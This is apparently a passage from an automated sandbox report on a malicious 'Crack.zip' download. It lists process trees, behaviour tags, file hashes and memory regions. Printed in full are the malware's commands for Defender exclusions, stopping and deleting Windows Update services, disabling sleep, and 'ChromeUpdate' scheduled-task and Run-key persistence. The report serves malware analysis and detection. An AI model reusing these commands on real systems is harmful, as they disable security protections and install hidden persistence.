764 3316 cmd.exe reg.exe PID 3316 wrote to memory of 4168 3316 cmd.exe reg.exe PID 3316 wrote to memory of 4168 3316 cmd.exe reg.exe PID 3644 wrote to memory of 3868 3644 cmd.exe powercfg.exe PID 3644 wrote to memory of 3868 3644 cmd.exe powercfg.exe PID 3316 wrote to memory of 5116 3316 cmd.exe reg.exe PID 3316 wrote to memory of 5116 3316 cmd.exe reg.exe PID 3316 wrote to memory of 2688 3316 cmd.exe reg.exe PID 3316 wrote to memory of 2688 3316 cmd.exe reg.exe PID 3316 wrote to memory of 1756 3316 cmd.exe reg.exe PID 3316 wrote to memory of 1756 3316 cmd.exe reg.exe PID 3604 wrote to memory of 4944 3604 Update.exe conhost.exe PID 3796 wrote to memory of 1616 3796 cmd.exe WMIC.exe PID 3796 wrote to memory of 1616 3796 cmd.exe WMIC.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/crack-watch/files/releases/download/ca/Crack.zip1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:940 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vieybfx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdate' /tr '''C:\Program Files\ChromeUpdate\Update.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\ChromeUpdate\Update.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ChromeUpdate" /t REG_SZ /f /d 'C:\Program Files\ChromeUpdate\Update.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iznvhmil#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "ChromeUpdate" } Else { "C:\Program Files\ChromeUpdate\Update.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn ChromeUpdate3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe wwcervyd2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ppqblwpwmghhsixh 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUFX9zerOLqyfV5p5IIIPTXecif75D+VYXIOaD4tnkrB2fDP9IQZMfg+iVVlhNRbmMN79MRifyO6Uwq7r7QxsXJx8n4Obz+C1TNZT/sBjhHaly+SynWhZiN24prHp/VTq7aAaWmtebCxKPk7tjsUOqkI/WY5IIYD/L/mVq2a7Uu9ZR/uUtm5j9plmQ6U+x61NNlg9L8LtJ//u1Fij39xU/WDSZow7jB4TkbvCOgFDyM4S6KqA9TPgrAJpGF6UT5CV/U725i+yYtjtkyP1WXyAgKjQR9PF97HfDROjSbrwKz7I/IdS3E3JvmMLokmQrzQ2tSPn0A76ciJ3JMty2BZtsAwoFXhQGVnofvN3B5vTs4kmoB+gkXCpRmPI4rTUz+43QeZFm3lO1uhw0nEtewSCLk4LGxQqR9mz9g0drWGN5XtJesEB2BtBwFU6bQGegMZe20enAYVBIDmIJ+z3YxlqN8Q==2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vieybfx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdate' /tr '''C:\Program Files\ChromeUpdate\Update.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\ChromeUpdate\Update.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ChromeUpdate" /t REG_SZ /f /d 'C:\Program Files\ChromeUpdate\Update.exe' }2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\ChromeUpdate\Update.exe"C:\Program Files\ChromeUpdate\Update.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vieybfx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdate' /tr '''C:\Program Files\ChromeUpdate\Update.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\ChromeUpdate\Update.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ChromeUpdate" /t REG_SZ /f /d 'C:\Program Files\ChromeUpdate\Update.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\ChromeUpdate\Update.exeFilesize
6.9MB
MD51631204510e27924774984f84392b3bc
SHA12244019f2c5b72ca02752db1b92b8d2200379c9b
SHA256bc9ce0fd11d995e2cb1ca5f4200d7b95b9bc8718a4beee23a5f5ccbc7388ee52
SHA512edc47498a57735d479492832924564819b0cd9af0d54c39936e215b3832d76461433b49d9fd98c1836352d8e0d34cd2c91adf3091b7b8809939556f6e670c5f5
-
C:\Program Files\ChromeUpdate\Update.exeFilesize
6.9MB
MD51631204510e27924774984f84392b3bc
SHA12244019f2c5b72ca02752db1b92b8d2200379c9b
SHA256bc9ce0fd11d995e2cb1ca5f4200d7b95b9bc8718a4beee23a5f5ccbc7388ee52
SHA512edc47498a57735d479492832924564819b0cd9af0d54c39936e215b3832d76461433b49d9fd98c1836352d8e0d34cd2c91adf3091b7b8809939556f6e670c5f5
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1IYUAPIF\Crack.zip.j6jricw.partialFilesize
6.8MB
MD5485a89a200683be78d78b0452e41c695
SHA1a84d44cb8ea8220df7f465bedc06aaa11eb36b0f
SHA2563f74497ab1ef54e7f89296d28ec6d2565465d416ceb6bac1e5034f06cfbe72fb
SHA5121fe942a1dec0997ea32c1f73d0d1dec8217da15a47b18a994158eb6106942f5e4a5cb677239e11263da2a109ae9d2606e4405c54b947eba408a2f2baa4473444
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\Crack[1].zipFilesize
6.8MB
MD5485a89a200683be78d78b0452e41c695
SHA1a84d44cb8ea8220df7f465bedc06aaa11eb36b0f
SHA2563f74497ab1ef54e7f89296d28ec6d2565465d416ceb6bac1e5034f06cfbe72fb
SHA5121fe942a1dec0997ea32c1f73d0d1dec8217da15a47b18a994158eb6106942f5e4a5cb677239e11263da2a109ae9d2606e4405c54b947eba408a2f2baa4473444
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\suggestions[1].en-USFilesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55eabb81f40bf3b88a1677853699692e6
SHA19be1b56a66e78113cba88f01c2022ad8a0c5d5ad
SHA256fa9918faaf899c4a165d497e183692e13e65fdd140026416ea56af4f218060b0
SHA5127fbef3a6f3056654a21b8d1c7fc9cc11e6a0d2adf100b016422bac65675dab68b8a1f0603bc44043c0c75e28f52f96815b0f33eaa17967f06d838c6ae0299c8f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52fd4fb751ae39737c0cc2450461f62c4
SHA1ba0358e721e3ff04e4cf9ac79b71279235dae163
SHA25610a352ab229aad09cd67814f467ad99ae64a86fa5ff831b884a98e4a0fb758af
SHA51201df9635c736834f00a7db3913e8ef95395e0681442a22c0a981846ca9f7c58e73aa9fef363fe6577717e3458071bdf31120f484889344754632f58d06fbbbda
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gonp22l3.lcz.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\System32\drivers\etc\hostsFilesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
C:\Windows\System32\drivers\etc\hostsFilesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
memory/708-171-0x000002183AFC0000-0x000002183AFD0000-memory.dmpFilesize
64KB
-
memory/708-168-0x000002183B240000-0x000002183B262000-memory.dmpFilesize
136KB
-
memory/708-172-0x000002183AFC0000-0x000002183AFD0000-memory.dmpFilesize
64KB
-
memory/2192-306-0x00007FF737EC0000-0x00007FF738B73000-memory.dmpFilesize
12.7MB
-
memory/2192-301-0x00007FF737EC0000-0x00007FF738B73000-memory.dmpFilesize
12.7MB
-
memory/2192-300-0x00007FF737EC0000-0x00007FF738B73000-memory.dmpFilesize
12.7MB
-
memory/2192-299-0x00007FF737EC0000-0x00007FF738B73000-memory.dmpFilesize
12.7MB
-
memory/2192-302-0x00007FF737EC0000-0x00007FF738B73000-memory.dmpFilesize
12.7MB
-
memory/2408-305-0x00000215FCA90000-0x00000215FCAB0000-memory.dmpFilesize
128KB
-
memory/2408-298-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmpFilesize
8.0MB
-
memory/2408-293-0x00000215FCA50000-0x00000215FCA90000-memory.dmpFilesize
256KB
-
memory/2408-296-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmpFilesize
8.0MB
-
memory/2408-290-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmpFilesize
8.0MB
-
memory/2408-291-0x00000215FC8D0000-0x00000215FC8F0000-memory.dmpFilesize
128KB
-
memory/2408-308-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmpFilesize
8.0MB
-
memory/2408-295-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmpFilesize
8.0MB
-
memory/2408-312-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmpFilesize
8.0MB
-
memory/2408-309-0x00000215FCA90000-0x00000215FCAB0000-memory.dmpFilesize
128KB
-
memory/2408-304-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmpFilesize
8.0MB
-
memory/3292-279-0x0000023EC7780000-0x0000023EC7790000-memory.dmpFilesize
64KB
-
memory/3292-280-0x0000023EC7780000-0x0000023EC7790000-memory.dmpFilesize
64KB
-
memory/3292-281-0x00007FF4BBD90000-0x00007FF4BBDA0000-memory.dmpFilesize
64KB
-
memory/3292-283-0x0000023EC7789000-0x0000023EC778F000-memory.dmpFilesize
24KB
-
memory/3420-250-0x000002302EE90000-0x000002302EE9A000-memory.dmpFilesize
40KB
-
memory/3420-234-0x0000023014B90000-0x0000023014BA0000-memory.dmpFilesize
64KB
-
memory/3420-253-0x000002302EED0000-0x000002302EED6000-memory.dmpFilesize
24KB
-
memory/3420-252-0x000002302EEA0000-0x000002302EEA8000-memory.dmpFilesize
32KB
-
memory/3420-251-0x000002302EEF0000-0x000002302EF0A000-memory.dmpFilesize
104KB
-
memory/3420-249-0x00007FF465A70000-0x00007FF465A80000-memory.dmpFilesize
64KB
-
memory/3420-254-0x000002302EEE0000-0x000002302EEEA000-memory.dmpFilesize
40KB
-
memory/3420-247-0x000002302EEB0000-0x000002302EECC000-memory.dmpFilesize
112KB
-
memory/3420-246-0x000002302ED40000-0x000002302ED4A000-memory.dmpFilesize
40KB
-
memory/3420-245-0x000002302EC60000-0x000002302EC7C000-memory.dmpFilesize
112KB
-
memory/3420-235-0x0000023014B90000-0x0000023014BA0000-memory.dmpFilesize
64KB
-
memory/3604-210-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmpFilesize
12.7MB
-
memory/3604-209-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmpFilesize
12.7MB
-
memory/3604-292-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmpFilesize
12.7MB
-
memory/3604-212-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmpFilesize
12.7MB
-
memory/3604-223-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmpFilesize
12.7MB
-
memory/3604-211-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmpFilesize
12.7MB
-
memory/3604-248-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmpFilesize
12.7MB
-
memory/3616-153-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmpFilesize
12.7MB
-
memory/3616-152-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmpFilesize
12.7MB
-
memory/3616-151-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmpFilesize
12.7MB
-
memory/3616-154-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmpFilesize
12.7MB
-
memory/3616-193-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmpFilesize
12.7MB
-
memory/3616-155-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmpFilesize
12.7MB
-
memory/3616-187-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmpFilesize
12.7MB
-
memory/4920-336-0x000001DD1C470000-0x000001DD1C480000-memory.dmpFilesize
64KB
-
memory/4920-337-0x000001DD1C470000-0x000001DD1C480000-memory.dmpFilesize
64KB
-
